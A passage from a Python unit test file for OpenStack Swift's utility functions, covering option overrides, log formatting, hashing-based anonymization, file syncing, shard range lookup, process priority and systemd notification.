'b30dde4d2b8562b8496466c3b46b2b9ac5054461') def test_parse_override_options(self): # When override_<thing> is passed in, it takes precedence. 
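        # Hedged usage sketch (assumption, not asserted here): a daemon entry
        # point would typically call something like
        #     opts = utils.parse_override_options(once=once, **conf)
        # and then iterate opts.policies / opts.devices / opts.partitions,
        # which are the three attributes checked throughout this test.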
opts = utils.parse_override_options( override_policies=[0, 1], override_devices=['sda', 'sdb'], override_partitions=[100, 200], policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1]) self.assertEqual(opts.devices, ['sda', 'sdb']) self.assertEqual(opts.partitions, [100, 200]) # When override_<thing> is passed in, it applies even in run-once # mode. opts = utils.parse_override_options( once=True, override_policies=[0, 1], override_devices=['sda', 'sdb'], override_partitions=[100, 200], policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1]) self.assertEqual(opts.devices, ['sda', 'sdb']) self.assertEqual(opts.partitions, [100, 200]) # In run-once mode, we honor the passed-in overrides. opts = utils.parse_override_options( once=True, policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1, 2, 3]) self.assertEqual(opts.devices, ['sda', 'sdb', 'sdc', 'sdd']) self.assertEqual(opts.partitions, [100, 200, 300, 400]) # In run-forever mode, we ignore the passed-in overrides. opts = utils.parse_override_options( policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, []) self.assertEqual(opts.devices, []) self.assertEqual(opts.partitions, []) def test_get_policy_index(self): # Account has no information about a policy req = Request.blank( '/sda1/p/a', environ={'REQUEST_METHOD': 'GET'}) res = Response() self.assertIsNone(utils.get_policy_index(req.headers, res.headers)) # The policy of a container can be specified by the response header req = Request.blank( '/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'}) res = Response(headers={'X-Backend-Storage-Policy-Index': '1'}) self.assertEqual('1', utils.get_policy_index(req.headers, res.headers)) # The policy of an object to be created can be specified by the request # header req = Request.blank( '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Backend-Storage-Policy-Index': '2'}) res = Response() self.assertEqual('2', utils.get_policy_index(req.headers, res.headers)) def test_log_string_formatter(self): # Plain ASCII lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='Swift is', b='great'), 'Swift is great') lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='', b='great'), ' great') lf = utils.LogStringFormatter(default='-') self.assertEqual(lf.format('{a} {b}', a='', b='great'), '- great') lf = utils.LogStringFormatter(default='-', quote=True) self.assertEqual(lf.format('{a} {b}', a='', b='great'), '- great') lf = utils.LogStringFormatter(quote=True) self.assertEqual(lf.format('{a} {b}', a='Swift is', b='great'), 'Swift%20is great') # Unicode & co lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='Swift est', b=u'g\u00e9nial ^^'), u'Swift est g\u00e9nial ^^') lf = utils.LogStringFormatter(quote=True) self.assertEqual(lf.format('{a} {b}', a='Swift est', b=u'g\u00e9nial ^^'), 'Swift%20est g%C3%A9nial%20%5E%5E') def test_str_anonymizer(self): anon = utils.StrAnonymizer('Swift is great!', 'md5', '') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{MD5}45e6f00d48fdcf86213602a87df18772') anon = utils.StrAnonymizer('Swift is great!', 'sha1', '') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SHA1}0010a3df215495d8bfa0ae4b66acc2afcc8f4c5c') anon = utils.StrAnonymizer('Swift is great!', 'md5', 
'salty_secret') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SMD5}ef4ce28fe3bdd10b6659458ceb1f3f0c') anon = utils.StrAnonymizer('Swift is great!', 'sha1', 'salty_secret') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SSHA1}a4968f76acaddff0eb4069ebe8805d9cab44c9fe') self.assertRaises(ValueError, utils.StrAnonymizer, 'Swift is great!', 'sha257', '') def test_str_anonymizer_python_maddness(self): with mock.patch('swift.common.utils.hashlib') as mocklib: if six.PY2: # python <2.7.9 doesn't have this algorithms_guaranteed, but # our if block short-circuts before we explode mocklib.algorithms = hashlib.algorithms mocklib.algorithms_guaranteed.sideEffect = AttributeError() else: # python 3 doesn't have this algorithms but our if block # short-circuts before we explode mocklib.algorithms.sideEffect.sideEffect = AttributeError() mocklib.algorithms_guaranteed = hashlib.algorithms_guaranteed utils.StrAnonymizer('Swift is great!', 'sha1', '') self.assertRaises(ValueError, utils.StrAnonymizer, 'Swift is great!', 'sha257', '') def test_str_format_time(self): dt = utils.StrFormatTime(10000.123456789) self.assertEqual(str(dt), '10000.123456789') self.assertEqual(dt.datetime, '01/Jan/1970/02/46/40') self.assertEqual(dt.iso8601, '1970-01-01T02:46:40') self.assertEqual(dt.asctime, 'Thu Jan 1 02:46:40 1970') self.assertEqual(dt.s, '10000') self.assertEqual(dt.ms, '123') self.assertEqual(dt.us, '123456') self.assertEqual(dt.ns, '123456789') self.assertEqual(dt.a, 'Thu') self.assertEqual(dt.A, 'Thursday') self.assertEqual(dt.b, 'Jan') self.assertEqual(dt.B, 'January') self.assertEqual(dt.c, 'Thu Jan 1 02:46:40 1970') self.assertEqual(dt.d, '01') self.assertEqual(dt.H, '02') self.assertEqual(dt.I, '02') self.assertEqual(dt.j, '001') self.assertEqual(dt.m, '01') self.assertEqual(dt.M, '46') self.assertEqual(dt.p, 'AM') self.assertEqual(dt.S, '40') self.assertEqual(dt.U, '00') self.assertEqual(dt.w, '4') self.assertEqual(dt.W, '00') self.assertEqual(dt.x, '01/01/70') self.assertEqual(dt.X, '02:46:40') self.assertEqual(dt.y, '70') self.assertEqual(dt.Y, '1970') self.assertIn(dt.Z, ('GMT', 'UTC')) # It depends of Python 2/3 self.assertRaises(ValueError, getattr, dt, 'z') def test_get_log_line(self): req = Request.blank( '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'}) res = Response() trans_time = 1.2 additional_info = 'some information' server_pid = 1234 exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \ '/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -' with mock.patch('time.time', mock.MagicMock(side_effect=[10001.0])): with mock.patch( 'os.getpid', mock.MagicMock(return_value=server_pid)): self.assertEqual( exp_line, utils.get_log_line(req, res, trans_time, additional_info, utils.LOG_LINE_DEFAULT_FORMAT, 'md5', '54LT')) def test_cache_from_env(self): # should never get logging when swift.cache is found env = {'swift.cache': 42} logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env, False)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env, True)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) 
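        # Hedged note (based on the env key used above, not asserted here):
        # middleware normally calls utils.cache_from_env(req.environ) to pick
        # up whatever client an upstream cache middleware stored under
        # 'swift.cache'; the cases above cover the "cache present" path.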
# check allow_none controls logging when swift.cache is not found err_msg = 'ERROR: swift.cache could not be found in env!' env = {} logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env)) self.assertTrue(err_msg in logger.get_lines_for_level('error')) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env, False)) self.assertTrue(err_msg in logger.get_lines_for_level('error')) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env, True)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) def test_fsync_dir(self): tempdir = None fd = None try: tempdir = mkdtemp() fd, temppath = tempfile.mkstemp(dir=tempdir) _mock_fsync = mock.Mock() _mock_close = mock.Mock() with patch('swift.common.utils.fsync', _mock_fsync): with patch('os.close', _mock_close): utils.fsync_dir(tempdir) self.assertTrue(_mock_fsync.called) self.assertTrue(_mock_close.called) self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int)) self.assertEqual(_mock_fsync.call_args[0][0], _mock_close.call_args[0][0]) # Not a directory - arg is file path self.assertRaises(OSError, utils.fsync_dir, temppath) logger = FakeLogger() def _mock_fsync(fd): raise OSError(errno.EBADF, os.strerror(errno.EBADF)) with patch('swift.common.utils.fsync', _mock_fsync): with mock.patch('swift.common.utils.logging', logger): utils.fsync_dir(tempdir) self.assertEqual(1, len(logger.get_lines_for_level('warning'))) finally: if fd is not None: os.close(fd) os.unlink(temppath) if tempdir: os.rmdir(tempdir) def test_renamer_with_fsync_dir(self): tempdir = None try: tempdir = mkdtemp() # Simulate part of object path already existing part_dir = os.path.join(tempdir, 'objects/1234/') os.makedirs(part_dir) obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32) obj_path = os.path.join(obj_dir, '1425276031.12345.data') # Object dir had to be created _m_os_rename = mock.Mock() _m_fsync_dir = mock.Mock() with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.renamer("fake_path", obj_path) _m_os_rename.assert_called_once_with('fake_path', obj_path) # fsync_dir on parents of all newly create dirs self.assertEqual(_m_fsync_dir.call_count, 3) # Object dir existed _m_os_rename.reset_mock() _m_fsync_dir.reset_mock() with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.renamer("fake_path", obj_path) _m_os_rename.assert_called_once_with('fake_path', obj_path) # fsync_dir only on the leaf dir self.assertEqual(_m_fsync_dir.call_count, 1) finally: if tempdir: shutil.rmtree(tempdir) def test_renamer_when_fsync_is_false(self): _m_os_rename = mock.Mock() _m_fsync_dir = mock.Mock() _m_makedirs_count = mock.Mock(return_value=2) with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): with patch('swift.common.utils.makedirs_count', _m_makedirs_count): utils.renamer("fake_path", "/a/b/c.data", fsync=False) _m_makedirs_count.assert_called_once_with("/a/b") _m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data") self.assertFalse(_m_fsync_dir.called) def test_makedirs_count(self): tempdir = None fd = None try: tempdir = mkdtemp() os.makedirs(os.path.join(tempdir, 'a/b')) # 4 new dirs created dirpath = os.path.join(tempdir, 'a/b/1/2/3/4') ret = utils.makedirs_count(dirpath) self.assertEqual(ret, 4) # no new dirs created - dir already exists 
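        # The returned count matters because renamer() uses makedirs_count()
        # to decide how many newly created parent directories need
        # fsync_dir() (see test_renamer_with_fsync_dir and
        # test_renamer_when_fsync_is_false above).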
ret = utils.makedirs_count(dirpath) self.assertEqual(ret, 0) # path exists and is a file fd, temppath = tempfile.mkstemp(dir=dirpath) os.close(fd) self.assertRaises(OSError, utils.makedirs_count, temppath) finally: if tempdir: shutil.rmtree(tempdir) def test_find_shard_range(self): ts = utils.Timestamp.now().internal start = utils.ShardRange('a/-a', ts, '', 'a') atof = utils.ShardRange('a/a-f', ts, 'a', 'f') ftol = utils.ShardRange('a/f-l', ts, 'f', 'l') ltor = utils.ShardRange('a/l-r', ts, 'l', 'r') rtoz = utils.ShardRange('a/r-z', ts, 'r', 'z') end = utils.ShardRange('a/z-', ts, 'z', '') ranges = [start, atof, ftol, ltor, rtoz, end] found = utils.find_shard_range('', ranges) self.assertEqual(found, None) found = utils.find_shard_range(' ', ranges) self.assertEqual(found, start) found = utils.find_shard_range(' ', ranges[1:]) self.assertEqual(found, None) found = utils.find_shard_range('b', ranges) self.assertEqual(found, atof) found = utils.find_shard_range('f', ranges) self.assertEqual(found, atof) found = utils.find_shard_range('f\x00', ranges) self.assertEqual(found, ftol) found = utils.find_shard_range('x', ranges) self.assertEqual(found, rtoz) found = utils.find_shard_range('r', ranges) self.assertEqual(found, ltor) found = utils.find_shard_range('}', ranges) self.assertEqual(found, end) found = utils.find_shard_range('}', ranges[:-1]) self.assertEqual(found, None) # remove l-r from list of ranges and try and find a shard range for an # item in that range. found = utils.find_shard_range('p', ranges[:-3] + ranges[-2:]) self.assertEqual(found, None) # add some sub-shards; a sub-shard's state is less than its parent # while the parent is undeleted, so insert these ahead of the # overlapping parent in the list of ranges ftoh = utils.ShardRange('a/f-h', ts, 'f', 'h') htok = utils.ShardRange('a/h-k', ts, 'h', 'k') overlapping_ranges = ranges[:2] + [ftoh, htok] + ranges[2:] found = utils.find_shard_range('g', overlapping_ranges) self.assertEqual(found, ftoh) found = utils.find_shard_range('h', overlapping_ranges) self.assertEqual(found, ftoh) found = utils.find_shard_range('k', overlapping_ranges) self.assertEqual(found, htok) found = utils.find_shard_range('l', overlapping_ranges) self.assertEqual(found, ftol) found = utils.find_shard_range('m', overlapping_ranges) self.assertEqual(found, ltor) ktol = utils.ShardRange('a/k-l', ts, 'k', 'l') overlapping_ranges = ranges[:2] + [ftoh, htok, ktol] + ranges[2:] found = utils.find_shard_range('l', overlapping_ranges) self.assertEqual(found, ktol) def test_parse_db_filename(self): actual = utils.parse_db_filename('hash.db') self.assertEqual(('hash', None, '.db'), actual) actual = utils.parse_db_filename('hash_1234567890.12345.db') self.assertEqual(('hash', '1234567890.12345', '.db'), actual) actual = utils.parse_db_filename( '/dev/containers/part/ash/hash/hash_1234567890.12345.db') self.assertEqual(('hash', '1234567890.12345', '.db'), actual) self.assertRaises(ValueError, utils.parse_db_filename, '/path/to/dir/') # These shouldn't come up in practice; included for completeness self.assertEqual(utils.parse_db_filename('hashunder_.db'), ('hashunder', '', '.db')) self.assertEqual(utils.parse_db_filename('lots_of_underscores.db'), ('lots', 'of', '.db')) def test_make_db_file_path(self): epoch = utils.Timestamp.now() actual = utils.make_db_file_path('hash.db', epoch) self.assertEqual('hash_%s.db' % epoch.internal, actual) actual = utils.make_db_file_path('hash_oldepoch.db', epoch) self.assertEqual('hash_%s.db' % epoch.internal, actual) actual = 
utils.make_db_file_path('/path/to/hash.db', epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.internal, actual) epoch = utils.Timestamp.now() actual = utils.make_db_file_path(actual, epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.internal, actual) # None strips epoch self.assertEqual('hash.db', utils.make_db_file_path('hash.db', None)) self.assertEqual('/path/to/hash.db', utils.make_db_file_path( '/path/to/hash_withepoch.db', None)) # epochs shouldn't have offsets epoch = utils.Timestamp.now(offset=10) actual = utils.make_db_file_path(actual, epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.normal, actual) self.assertRaises(ValueError, utils.make_db_file_path, '/path/to/hash.db', 'bad epoch') def test_modify_priority(self): pid = os.getpid() logger = debug_logger() called = {} def _fake_setpriority(*args): called['setpriority'] = args def _fake_syscall(*args): called['syscall'] = args # Test if current architecture supports changing of priority try: utils.NR_ioprio_set() except OSError as e: raise unittest.SkipTest(e) with patch('swift.common.utils._libc_setpriority', _fake_setpriority), \ patch('swift.common.utils._posix_syscall', _fake_syscall): called = {} # not set / default utils.modify_priority({}, logger) self.assertEqual(called, {}) called = {} # just nice utils.modify_priority({'nice_priority': '1'}, logger) self.assertEqual(called, {'setpriority': (0, pid, 1)}) called = {} # just ionice class uses default priority 0 utils.modify_priority({'ionice_class': 'IOPRIO_CLASS_RT'}, logger) architecture = os.uname()[4] arch_bits = platform.architecture()[0] if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, {'syscall': (251, 1, pid, 1 << 13)}) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, {'syscall': (30, 1, pid, 1 << 13)}) else: self.fail("Unexpected call: %r" % called) called = {} # just ionice priority is ignored utils.modify_priority({'ionice_priority': '4'}, logger) self.assertEqual(called, {}) called = {} # bad ionice class utils.modify_priority({'ionice_class': 'class_foo'}, logger) self.assertEqual(called, {}) called = {} # ionice class & priority utils.modify_priority({ 'ionice_class': 'IOPRIO_CLASS_BE', 'ionice_priority': '4', }, logger) if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, { 'syscall': (251, 1, pid, 2 << 13 | 4) }) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, { 'syscall': (30, 1, pid, 2 << 13 | 4) }) else: self.fail("Unexpected call: %r" % called) called = {} # all utils.modify_priority({ 'nice_priority': '-15', 'ionice_class': 'IOPRIO_CLASS_IDLE', 'ionice_priority': '6', }, logger) if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, { 'setpriority': (0, pid, -15), 'syscall': (251, 1, pid, 3 << 13 | 6), }) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, { 'setpriority': (0, pid, -15), 'syscall': (30, 1, pid, 3 << 13 | 6), }) else: self.fail("Unexpected call: %r" % called) def test__NR_ioprio_set(self): with patch('os.uname', return_value=('', '', '', '', 'x86_64')), \ patch('platform.architecture', return_value=('64bit', '')): self.assertEqual(251, utils.NR_ioprio_set()) with patch('os.uname', return_value=('', '', '', '', 'x86_64')), \ patch('platform.architecture', return_value=('32bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) with patch('os.uname', return_value=('', '', '', '', 'aarch64')), \ patch('platform.architecture', return_value=('64bit', 
'')): self.assertEqual(30, utils.NR_ioprio_set()) with patch('os.uname', return_value=('', '', '', '', 'aarch64')), \ patch('platform.architecture', return_value=('32bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) with patch('os.uname', return_value=('', '', '', '', 'alpha')), \ patch('platform.architecture', return_value=('64bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) @requires_o_tmpfile_support_in_tmp def test_link_fd_to_path_linkat_success(self): tempdir = mkdtemp() fd = os.open(tempdir, utils.O_TMPFILE | os.O_WRONLY) data = b"I'm whatever Gotham needs me to be" _m_fsync_dir = mock.Mock() try: os.write(fd, data) # fd is O_WRONLY self.assertRaises(OSError, os.read, fd, 1) file_path = os.path.join(tempdir, uuid4().hex) with mock.patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.link_fd_to_path(fd, file_path, 1) with open(file_path, 'rb') as f: self.assertEqual(f.read(), data) self.assertEqual(_m_fsync_dir.call_count, 2) finally: os.close(fd) shutil.rmtree(tempdir) @requires_o_tmpfile_support_in_tmp def test_link_fd_to_path_target_exists(self): tempdir = mkdtemp() # Create and write to a file fd, path = tempfile.mkstemp(dir=tempdir) os.write(fd, b"hello world") os.fsync(fd) os.close(fd) self.assertTrue(os.path.exists(path)) fd = os.open(tempdir, utils.O_TMPFILE | os.O_WRONLY) try: os.write(fd, b"bye world") os.fsync(fd) utils.link_fd_to_path(fd, path, 0, fsync=False) # Original file now should have been over-written with open(path, 'rb') as f: self.assertEqual(f.read(), b"bye world") finally: os.close(fd) shutil.rmtree(tempdir) def test_link_fd_to_path_errno_not_EEXIST_or_ENOENT(self): _m_linkat = mock.Mock( side_effect=IOError(errno.EACCES, os.strerror(errno.EACCES))) with mock.patch('swift.common.utils.linkat', _m_linkat): try: utils.link_fd_to_path(0, '/path', 1) except IOError as err: self.assertEqual(err.errno, errno.EACCES) else: self.fail("Expecting IOError exception") self.assertTrue(_m_linkat.called) @requires_o_tmpfile_support_in_tmp def test_linkat_race_dir_not_exists(self): tempdir = mkdtemp() target_dir = os.path.join(tempdir, uuid4().hex) target_path = os.path.join(target_dir, uuid4().hex) os.mkdir(target_dir) fd = os.open(target_dir, utils.O_TMPFILE | os.O_WRONLY) # Simulating directory deletion by other backend process os.rmdir(target_dir) self.assertFalse(os.path.exists(target_dir)) try: utils.link_fd_to_path(fd, target_path, 1) self.assertTrue(os.path.exists(target_dir)) self.assertTrue(os.path.exists(target_path)) finally: os.close(fd) shutil.rmtree(tempdir) def test_safe_json_loads(self): expectations = { None: None, '': None, 0: None, 1: None, '"asdf"': 'asdf', '[]': [], '{}': {}, "{'foo': 'bar'}": None, '{"foo": "bar"}': {'foo': 'bar'}, } failures = [] for value, expected in expectations.items(): try: result = utils.safe_json_loads(value) except Exception as e: # it's called safe, if it blows up the test blows up self.fail('%r caused safe method to throw %r!' 
% ( value, e)) try: self.assertEqual(expected, result) except AssertionError: failures.append('%r => %r (expected %r)' % ( value, result, expected)) if failures: self.fail('Invalid results from pure function:\n%s' % '\n'.join(failures)) def test_strict_b64decode(self): expectations = { None: ValueError, 0: ValueError, b'': b'', u'': b'', b'A': ValueError, b'AA': ValueError, b'AAA': ValueError, b'AAAA': b'\x00\x00\x00', u'AAAA': b'\x00\x00\x00', b'////': b'\xff\xff\xff', u'////': b'\xff\xff\xff', b'A===': ValueError, b'AA==': b'\x00', b'AAA=': b'\x00\x00', b' AAAA': ValueError, b'AAAA ': ValueError, b'AAAA============': b'\x00\x00\x00', b'AA&AA==': ValueError, b'====': b'', } failures = [] for value, expected in expectations.items(): try: result = utils.strict_b64decode(value) except Exception as e: if inspect.isclass(expected) and issubclass( expected, Exception): if not isinstance(e, expected): failures.append('%r raised %r (expected to raise %r)' % (value, e, expected)) else: failures.append('%r raised %r (expected to return %r)' % (value, e, expected)) else: if inspect.isclass(expected) and issubclass( expected, Exception): failures.append('%r => %r (expected to raise %r)' % (value, result, expected)) elif result != expected: failures.append('%r => %r (expected %r)' % ( value, result, expected)) if failures: self.fail('Invalid results from pure function:\n%s' % '\n'.join(failures)) def test_replace_partition_in_path(self): # Check for new part = part * 2 old = '/s/n/d/o/700/c77/af088baea4806dcaba30bf07d9e64c77/f' new = '/s/n/d/o/1400/c77/af088baea4806dcaba30bf07d9e64c77/f' # Expected outcome self.assertEqual(utils.replace_partition_in_path(old, 11), new) # Make sure there is no change if the part power didn't change self.assertEqual(utils.replace_partition_in_path(old, 10), old) self.assertEqual(utils.replace_partition_in_path(new, 11), new) # Check for new part = part * 2 + 1 old = '/s/n/d/o/693/c77/ad708baea4806dcaba30bf07d9e64c77/f' new = '/s/n/d/o/1387/c77/ad708baea4806dcaba30bf07d9e64c77/f' # Expected outcome self.assertEqual(utils.replace_partition_in_path(old, 11), new) # Make sure there is no change if the part power didn't change self.assertEqual(utils.replace_partition_in_path(old, 10), old) self.assertEqual(utils.replace_partition_in_path(new, 11), new) def test_round_robin_iter(self): it1 = iter([1, 2, 3]) it2 = iter([4, 5]) it3 = iter([6, 7, 8, 9]) it4 = iter([]) rr_its = utils.round_robin_iter([it1, it2, it3, it4]) got = list(rr_its) # Expect that items get fetched in a round-robin fashion from the # iterators self.assertListEqual([1, 4, 6, 2, 5, 7, 3, 8, 9], got) @with_tempdir def test_get_db_files(self, tempdir): dbdir = os.path.join(tempdir, 'dbdir') self.assertEqual([], utils.get_db_files(dbdir)) path_1 = os.path.join(dbdir, 'dbfile.db') self.assertEqual([], utils.get_db_files(path_1)) os.mkdir(dbdir) self.assertEqual([], utils.get_db_files(path_1)) with open(path_1, 'wb'): pass self.assertEqual([path_1], utils.get_db_files(path_1)) path_2 = os.path.join(dbdir, 'dbfile_2.db') self.assertEqual([path_1], utils.get_db_files(path_2)) with open(path_2, 'wb'): pass self.assertEqual([path_1, path_2], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2], utils.get_db_files(path_2)) path_3 = os.path.join(dbdir, 'dbfile_3.db') self.assertEqual([path_1, path_2], utils.get_db_files(path_3)) with open(path_3, 'wb'): pass self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_2)) 
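        # get_db_files() returns every sibling DB file that shares the hash
        # prefix, in filename order, regardless of which of them is passed in;
        # unrelated hashes yield [] and a .pending path maps back to the same
        # DB list (both checked just below).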
self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_3)) other_hash = os.path.join(dbdir, 'other.db') self.assertEqual([], utils.get_db_files(other_hash)) other_hash = os.path.join(dbdir, 'other_1.db') self.assertEqual([], utils.get_db_files(other_hash)) pending = os.path.join(dbdir, 'dbfile.pending') self.assertEqual([path_1, path_2, path_3], utils.get_db_files(pending)) with open(pending, 'wb'): pass self.assertEqual([path_1, path_2, path_3], utils.get_db_files(pending)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_2)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_3)) self.assertEqual([], utils.get_db_files(dbdir)) os.unlink(path_1) self.assertEqual([path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_2, path_3], utils.get_db_files(path_2)) self.assertEqual([path_2, path_3], utils.get_db_files(path_3)) os.unlink(path_2) self.assertEqual([path_3], utils.get_db_files(path_1)) self.assertEqual([path_3], utils.get_db_files(path_2)) self.assertEqual([path_3], utils.get_db_files(path_3)) os.unlink(path_3) self.assertEqual([], utils.get_db_files(path_1)) self.assertEqual([], utils.get_db_files(path_2)) self.assertEqual([], utils.get_db_files(path_3)) self.assertEqual([], utils.get_db_files('/path/to/nowhere')) def test_get_redirect_data(self): ts_now = utils.Timestamp.now() headers = {'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') self.assertIsNone(utils.get_redirect_data(response)) headers = {'Location': '/a/c/o', 'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') path, ts = utils.get_redirect_data(response) self.assertEqual('a/c', path) self.assertEqual(ts_now, ts) headers = {'Location': '/a/c', 'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') path, ts = utils.get_redirect_data(response) self.assertEqual('a/c', path) self.assertEqual(ts_now, ts) def do_test(headers): response = FakeResponse(200, headers, b'') with self.assertRaises(ValueError) as cm: utils.get_redirect_data(response) return cm.exception exc = do_test({'Location': '/a', 'X-Backend-Redirect-Timestamp': ts_now.internal}) self.assertIn('Invalid path', str(exc)) exc = do_test({'Location': '', 'X-Backend-Redirect-Timestamp': ts_now.internal}) self.assertIn('Invalid path', str(exc)) exc = do_test({'Location': '/a/c', 'X-Backend-Redirect-Timestamp': 'bad'}) self.assertIn('Invalid timestamp', str(exc)) exc = do_test({'Location': '/a/c'}) self.assertIn('Invalid timestamp', str(exc)) exc = do_test({'Location': '/a/c', 'X-Backend-Redirect-Timestamp': '-1'}) self.assertIn('Invalid timestamp', str(exc)) @mock.patch('pkg_resources.load_entry_point') def test_load_pkg_resource(self, mock_driver): tests = { ('swift.diskfile', 'egg:swift#replication.fs'): ('swift', 'swift.diskfile', 'replication.fs'), ('swift.diskfile', 'egg:swift#erasure_coding.fs'): ('swift', 'swift.diskfile', 'erasure_coding.fs'), ('swift.section', 'egg:swift#thing.other'): ('swift', 'swift.section', 'thing.other'), ('swift.section', 'swift#thing.other'): ('swift', 'swift.section', 'thing.other'), ('swift.section', 'thing.other'): ('swift', 'swift.section', 'thing.other'), } for args, expected in tests.items(): utils.load_pkg_resource(*args) mock_driver.assert_called_with(*expected) with self.assertRaises(TypeError) as cm: args = ('swift.diskfile', 'nog:swift#replication.fs') utils.load_pkg_resource(*args) 
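        # Per the mapping above, 'egg:' is the only URI scheme accepted (a
        # bare 'dist#entry_point' or plain entry point name is also
        # tolerated); anything else, such as 'nog:', raises TypeError with
        # the message asserted below.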
self.assertEqual("Unhandled URI scheme: 'nog'", str(cm.exception)) def test_systemd_notify(self): m_sock = mock.Mock(connect=mock.Mock(), sendall=mock.Mock()) with mock.patch('swift.common.utils.socket.socket', return_value=m_sock) as m_socket: # No notification socket m_socket.reset_mock() m_sock.reset_mock() utils.systemd_notify() self.assertEqual(m_socket.call_count, 0) self.assertEqual(m_sock.connect.call_count, 0) self.assertEqual(m_sock.sendall.call_count, 0) # File notification socket m_socket.reset_mock() m_sock.reset_mock() os.environ['NOTIFY_SOCKET'] = 'foobar' utils.systemd_notify() m_socket.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM) m_sock.connect.assert_called_once_with('foobar') m_sock.sendall.assert_called_once_with(b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) # Abstract notification socket m_socket.reset_mock() m_sock.reset_mock() os.environ['NOTIFY_SOCKET'] = '@foobar' utils.systemd_notify() m_socket.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM) m_sock.connect.assert_called_once_with('\0foobar') m_sock.sendall.assert_called_once_with(b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) # Test logger with connection error m_sock = mock.Mock(connect=mock.Mock(side_effect=EnvironmentError), sendall=mock.Mock()) m_logger = mock.Mock(debug=mock.Mock()) with mock.patch('swift.common.utils.socket.socket', return_value=m_sock) as m_socket: os.environ['NOTIFY_SOCKET'] = '@foobar' m_sock.reset_mock() m_logger.reset_mock() utils.systemd_notify() self.assertEqual(0, m_sock.sendall.call_count) self.assertEqual(0, m_logger.debug.call_count) m_sock.reset_mock() m_logger.reset_mock() utils.systemd_notify(logger=m_logger) self.assertEqual(0, m_sock.sendall.call_count) m_logger.debug.assert_called_once_with( "Systemd notification failed", exc_info=True) # Test it for real sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) sock.settimeout(5) sock.bind('\0foobar') os.environ['NOTIFY_SOCKET'] = '@foobar' utils.systemd_notify() msg = sock.recv(512) sock.close() self.assertEqual(msg, b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) class ResellerConfReader(unittest.TestCase): def setUp(self): self.default_rules = {'operator_roles': ['admin', 'swiftoperator'], 'service_roles': [], 'require_group': ''} def test_defaults(self): conf = {} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_']) self.assertEqual(options['AUTH_'], self.default_rules) def test_same_as_default(self): 